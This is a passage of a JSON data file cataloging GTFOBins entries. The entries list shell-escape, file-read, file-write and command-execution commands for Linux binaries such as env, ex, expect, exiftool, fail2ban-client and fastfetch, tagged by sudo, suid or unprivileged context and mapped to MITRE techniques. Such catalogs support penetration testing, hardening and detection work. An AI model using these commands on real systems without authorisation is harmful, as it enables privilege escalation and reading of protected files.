/path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/egrep/"]},{"id":"gtfo:elvish:file-read:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-read:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-read:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-write:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-write:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-write:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:shell:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:shell:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:shell:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:emacs:file-read:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"emacs /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:file-read:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"emacs /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:file-write:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"emacs /path/to/output-file\nDATA\nC-x C-s","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:file-write:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"emacs /path/to/output-file\nDATA\nC-x C-s","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:shell:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"emacs -Q -nw --eval '(term \"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:shell:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"emacs -Q -nw --eval '(term \"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:enscript:shell:0:sudo","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/enscript/"]},{"id":"gtfo:enscript:shell:0:suid","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/enscript/"]},{"id":"gtfo:enscript:shell:0:unprivileged","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/enscript/"]},{"id":"gtfo:env:shell:0:sudo","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"env /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/env/"]},{"id":"gtfo:env:shell:0:suid","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"env /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/env/"]},{"id":"gtfo:env:shell:0:unprivileged","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"env /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/env/"]},{"id":"gtfo:eqn:file-read:0:sudo","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/eqn/"]},{"id":"gtfo:eqn:file-read:0:suid","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/eqn/"]},{"id":"gtfo:eqn:file-read:0:unprivileged","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/eqn/"]},{"id":"gtfo:espeak:file-read:0:sudo","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/espeak/"]},{"id":"gtfo:espeak:file-read:0:suid","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/espeak/"]},{"id":"gtfo:espeak:file-read:0:unprivileged","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/espeak/"]},{"id":"gtfo:ex:inherit:0:sudo","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:inherit:0:suid","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:inherit:0:unprivileged","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:shell:0:sudo","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:shell:0:suid","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:shell:0:unprivileged","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:exiftool:file-read:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file\ncat /path/to/output-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-read:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file\ncat /path/to/output-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:1:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool \"-description<=/path/to/input-file --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:1:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool \"-description<=/path/to/input-file --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:2:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool \"-description=DATA --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:2:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool \"-description=DATA --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:3:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool -description -W /path/to/output-file --filename /path/to/input-file","description":"Writes the metadata tags of the input file in textual format to the output.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:3:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool -description -W /path/to/output-file --filename /path/to/input-file","description":"Writes the metadata tags of the input file in textual format to the output.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:inherit:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"exiftool -if '...' /etc/passwd","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:inherit:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"exiftool -if '...' /etc/passwd","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:expand:file-read:0:sudo","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expand/"]},{"id":"gtfo:expand:file-read:0:suid","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expand/"]},{"id":"gtfo:expand:file-read:0:unprivileged","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expand/"]},{"id":"gtfo:expect:file-read:0:sudo","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:file-read:0:suid","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:file-read:0:unprivileged","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:shell:0:sudo","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh;interact'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:shell:0:suid","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh -p;interact'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:shell:0:unprivileged","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh;interact'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:facter:inherit:0:sudo","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"FACTERLIB=/path/to/dir/ facter","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/facter/"]},{"id":"gtfo:facter:inherit:0:unprivileged","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"FACTERLIB=/path/to/dir/ facter","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/facter/"]},{"id":"gtfo:facter:inherit:1:sudo","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"facter --custom-dir=/path/to/dir/ x","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/facter/"]},{"id":"gtfo:facter:inherit:1:unprivileged","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"facter --custom-dir=/path/to/dir/ x","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/facter/"]},{"id":"gtfo:fail2ban-client:command:0:sudo","toolId":"gtfo:fail2ban-client","toolName":"fail2ban-client","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fail2ban-client add x\nfail2ban-client set x addaction x\nfail2ban-client set x action x actionban /path/to/command\nfail2ban-client start x\nfail2ban-client set x banip 999.999.999.999\nfail2ban-client set x unbanip 999.999.999.999\nfail2ban-client stop x","description":"The subprocess is immediately sent to the background, but `fail2ban-client` waits on a return code from the subprocess. The `banip` command will hang until the subprocess returns.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"]},{"id":"gtfo:fail2ban-client:command:1:sudo","toolId":"gtfo:fail2ban-client","toolName":"fail2ban-client","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-dir/fail2ban.conf <<EOF\n[Definition]\nEOF\n\ncat >/path/to/temp-dir/jail.local <<EOF\n[x]\nenabled = true\naction = x\nEOF\n\nmkdir -p /path/to/temp-dir/action.d/\ncat >/path/to/temp-dir/action.d/x.conf <<EOF\n[Definition]\nactionstart = /path/to/command\nEOF\n\nmkdir -p /path/to/temp-dir/filter.d/\ncat >/path/to/temp-dir/filter.d/x.conf <<EOF\n[Definition]\nEOF\n\nfail2ban-client -c /path/to/temp-dir/ -v restart","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"]},{"id":"gtfo:fastfetch:command:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:command:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:command:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:file-read:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:file-read:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:file-read:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:shell:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:shell:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:shell:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:ffmpeg:library-load:0:sudo","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so 